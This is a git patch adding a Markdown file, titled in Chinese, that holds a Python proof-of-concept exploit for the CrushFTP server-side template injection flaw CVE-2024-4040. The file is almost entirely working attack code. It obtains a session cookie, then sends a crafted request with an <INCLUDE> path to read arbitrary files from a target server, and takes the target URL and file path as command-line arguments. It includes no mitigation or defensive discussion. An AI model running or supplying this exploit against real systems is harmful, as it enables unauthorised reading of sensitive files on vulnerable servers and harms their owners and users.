From 17f587dbbc429d8909989b8e09c9ca8ff9639c38 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 20:41:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20CrushFTP=E6=9C=8D=E5=8A=A1=E5=99=A8?=
 =?UTF-8?q?=E7=AB=AF=E6=A8=A1=E6=9D=BF=E6=B3=A8=E5=85=A5(CVE-2024-4040).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 CrushFTP服务器端模板注入(CVE-2024-4040).md | 59 ++++++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 CrushFTP服务器端模板注入(CVE-2024-4040).md

diff --git a/CrushFTP服务器端模板注入(CVE-2024-4040).md b/CrushFTP服务器端模板注入(CVE-2024-4040).md
new file mode 100644
index 0000000..bb3e000
--- /dev/null
+++ b/CrushFTP服务器端模板注入(CVE-2024-4040).md
@@ -0,0 +1,59 @@
+## CrushFTP服务器端模板注入(CVE-2024-4040)
+
+## poc
+```python
+import requests
+import argparse
+
+HEADER = '\033[95m'
+OKBLUE = '\033[94m'
+OKCYAN = '\033[96m'
+OKGREEN = '\033[92m'
+WARNING = '\033[93m'
+FAIL = '\033[91m'
+ENDC = '\033[0m'
+BOLD = '\033[1m'
+UNDERLINE = '\033[4m'
+
+def get_cookies(url):
+    try:
+        session = requests.Session()
+        response = session.get(url)
+        if response.status_code != 200:
+            raise Exception("Failed to connect to the server")
+        session.cookies.get_dict()
+        return session.cookies.get_dict()
+    except Exception as e:
+        print(FAIL + "Error: " + str(e) + ENDC)
+        quit()
+
+def exploit(url, cookies, path):
+    try:
+        if not path.startswith("/") or not path.endswith("/"):
+            raise Exception("Invalid path format. Path should start and end with '/'")
+        url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
+        response = requests.get(url, cookies=cookies)
+        if response.status_code != 200:
+            raise Exception("Failed to connect to the server")
+        return response.text
+    except Exception as e:
+        print(FAIL + "Error: " + str(e) + ENDC)
+        quit()
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-u", "--url", help="URL of the target", required=True)
+    parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
+    args = parser.parse_args()
+    url = args.url
+    path = args.path
+    if not url.startswith("http"):
+        print(WARNING + "URL should start with 'http' or 'https'")
+        quit()
+    cookies = get_cookies(url)
+    if 'currentAuth' not in cookies:
+        print(WARNING + "Not vulnerable" + ENDC)
+        quit()
+    else:
+        print(OKCYAN + exploit(url, cookies, path) + ENDC)
+```